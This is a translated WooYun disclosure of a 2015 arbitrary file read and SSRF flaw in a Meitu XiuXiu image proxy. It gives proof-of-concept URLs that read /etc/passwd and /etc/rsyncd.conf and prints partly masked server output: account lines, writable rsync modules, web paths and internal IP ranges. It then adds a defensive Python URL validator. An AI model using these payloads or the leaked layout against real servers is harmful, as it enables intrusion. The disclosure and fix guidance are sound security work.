
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0106865

Title: Arbitrary file inclusion vulnerability on a 美图秀秀 (Meitu XiuXiu) site

Vendor: 美图秀秀 (Meitu XiuXiu)

Author: J4rn4ben

Submitted: 2015-04-09 16:35

Fixed: 2015-05-24 16:46

Published: 2015-05-24 16:46

Vulnerability type: File inclusion

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2015-04-09: Details sent to the vendor, awaiting vendor response
2015-04-09: Vendor confirmed; details disclosed to the vendor only
2015-04-19: Details disclosed to core white hats and relevant domain experts
2015-04-29: Details disclosed to regular white hats
2015-05-09: Details disclosed to intern white hats
2015-05-24: Details disclosed to the public

Brief description:

A Meitu XiuXiu URL that loads an image from a caller-supplied address does not validate where that address points, so it can be used for SSRF against the internal network or to read arbitrary local files from the server.

Detailed description:

http://xiuxiu.web.meitu.com/plat/pic_proxy.php?url=/etc/passwd

The url parameter is handed to the image fetcher without being restricted to http(s) URLs, so a bare filesystem path is read from the server and returned in the response:

masked region
*****/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
hald*****


The same read also gives every web root path on the host:
http://xiuxiu.web.meitu.com/plat/pic_proxy.php?url=/etc/rsyncd.conf

masked region
*****ww_pomelo_com]
path = /www/web/www.pomelo.com/
read only = no
hosts allow = 172.17.16.0/24 222.76.241.154/29 222.76.241.146/29

[duoduo_meitu_com]
path = /www/web/kankan.web.meitu.com/
read only = no
hosts allow = 172.17.16.0/24 222.76.241.154/29 222.76.241.146/29

[corp_meitu_com]
path = /www/web/corp.meitu.com/
read only = no
hosts allow = 172.17.16.0/24 222.76.241.154/29 222.76.241.146/29

[www_52hxw_com]
path = /www/web/www.52hxw.com/
read only = no
hosts allow = 172.17.16.0/24 222.76.241.154/29 222.76.241.146/29

[all_meitu_com]
path = /www/web/all.meitu.com/
read only = no
hosts allow = 172.17.16.0/24 222.76.241.154/29 222.76.241.146/29

[xiuxiu_mobile_meitudata_com]
path = /www/web/xiuxiu.mobile.meitudata.com/
read only = no
hosts allow = 172.17.16.0/24 222.76.241.154/29 222.76.241.146/29

[wx_upload_meitu_com]
path = /www/web/wx.upload.meitu.com/
read only = no
hosts allow = 172.17.16.0/24

[expression_meitu_com]
path = /www/web/expression.meitu.com/
read only = no
hosts allow = 172.17.16.0/24 222.76.241.154/29 222.76.241.146/29

[xiuxiu_web_meitu_com]
path = /www/web/xiuxiu.web.meitu.com/
read only = no
hosts allow = 172.17.16.0/24 222.76.241.154/29 222.76.241.146/29

[guanjia_meitu_com]
path = /www/web/guanjia.meitu.com/
read only = no
hosts allow = 172.17.16.0/24 222.76.241.154/29 222.76.241.146/29

[www_posterlabs_cn]
path = /www/web/www.posterlabs.cn/
read only = no
hosts allow = 172.17.16.0/24 222.76.241.154/29 222.76.241.146/29

[en_meitu_com]
path = /www/web/en.meitu.com/
read only = no
hosts allow = 172.17.16.0/24 222.76.241.154/2*****

Note that every rsync module is writable (read only = no) and is restricted by hosts allow to the internal 172.17.16.0/24 range plus two small public blocks. An internal RFC 1918 range like that is exactly what the SSRF side of this bug would reach, which is why the endpoint is more than a local file read.

Proof of concept:

http://xiuxiu.web.meitu.com/plat/pic_proxy.php?url=/etc/passwd
http://xiuxiu.web.meitu.com/plat/pic_proxy.php?url=/etc/rsyncd.conf

Suggested fix:

Strictly validate the url parameter: accept only http(s) URLs, and refuse any host that resolves to a loopback, link-local or private address.
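The validator below is an added example of what "strictly validate the parameter" means for an image proxy like pic_proxy.php; it is not the original endpoint's code, and the host names, addresses and function names in it are assumptions made for the example. It rejects anything that is not an http(s) URL (so a bare path such as /etc/passwd, or file://, php:// and gopher:// URLs, never reach the fetcher), optionally enforces a host allowlist, and refuses any host that resolves to a non-public address, including the 172.17.16.0/24 range seen in the leaked rsyncd.conf. The DNS resolver is injected so the example runs offline against a constructed table.

```python
"""Added example: URL validation for an image proxy (not the original pic_proxy.php)."""
import ipaddress
from typing import Callable, Iterable, List, Optional, Set
from urllib.parse import urlsplit

Resolver = Callable[[str], Iterable[str]]

# Constructed DNS table standing in for a real resolver (hypothetical names).
FAKE_DNS = {
    "img.example.com": ["93.184.216.34"],
    "cdn.example.com": ["93.184.216.34", "93.184.216.35"],
    # Attacker-controlled name that points back into the internal network.
    "evil.example.net": ["172.17.16.5"],
    # Name answering with one public and one loopback address (rebinding style).
    "flaky.example.net": ["93.184.216.36", "127.0.0.1"],
}


def fake_resolver(host: str) -> Iterable[str]:
    """Offline stand-in for socket.getaddrinfo; returns [] for unknown names."""
    return FAKE_DNS.get(host, [])


def _resolve_host(host: str, resolve: Resolver) -> List[str]:
    """IP literals are used as-is; anything else goes through the resolver."""
    try:
        return [str(ipaddress.ip_address(host))]
    except ValueError:
        return list(resolve(host))


def validate_proxy_url(url: str,
                       allowed_hosts: Optional[Set[str]],
                       resolve: Resolver = fake_resolver) -> Optional[str]:
    """Return None if url is safe for the proxy to fetch, else the reason it is not."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return "scheme not allowed"          # /etc/passwd, file://, php://filter, gopher://
    if not parts.hostname:
        return "missing host"
    if parts.username is not None or parts.password is not None:
        return "userinfo not allowed"        # http://img.example.com@evil.example.net/
    try:
        port = parts.port
    except ValueError:
        return "invalid port"
    if port not in (None, 80, 443):
        return "port not allowed"
    host = parts.hostname.rstrip(".")        # urlsplit already lower-cases the host
    if allowed_hosts is not None and host not in allowed_hosts:
        return "host not in allowlist"
    ips = _resolve_host(host, resolve)
    if not ips:
        return "host does not resolve"
    # Every answer must be globally routable; one bad record is enough to reject.
    # A real getaddrinfo also normalises shorthand such as 127.1 or 2130706433,
    # so those forms end up here as well.
    if not all(ipaddress.ip_address(ip).is_global for ip in ips):
        return "host resolves to a non-public address"
    return None


if __name__ == "__main__":
    for candidate in ["/etc/passwd", "file:///etc/rsyncd.conf",
                      "http://172.17.16.5/x.png", "http://evil.example.net/x.png",
                      "http://img.example.com/x.png"]:
        print(candidate, "->", validate_proxy_url(candidate, None) or "ok")
```

Two things the check cannot do on its own: the fetch must connect to the address that was validated rather than re-resolving the hostname (otherwise a second DNS answer can point at 127.0.0.1), and any 3xx redirect target must go through the same validation or redirects must be disabled. Checking that the response Content-Type is an image before relaying it closes the remaining information-leak path.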

Copyright notice: when reposting, please credit the source: J4rn4ben@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: Low

Vulnerability Rank: 5

Confirmed at: 2015-04-09 16:44

Vendor reply:

Thanks for the heads-up, white hat!

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2015-05-24 20:19 | Me_Fortune ( Regular white hat | Rank: 209 Vulnerabilities: 71 | I'm Me_Fortune)

    Bro, did you enumerate the URLs first and then add the payload, or did you use a tool?

  2. 2015-05-25 07:28 | J4rn4ben ( Passer-by | Rank: 15 Vulnerabilities: 4 | A wild boar that likes to swim freestyle in West Lake)

    @Me_Fortune Tested manually; just look at which URLs seem suspicious and test those.

  3. 2015-05-25 08:22 | Me_Fortune ( Regular white hat | Rank: 209 Vulnerabilities: 71 | I'm Me_Fortune)

    @J4rn4ben Thanks!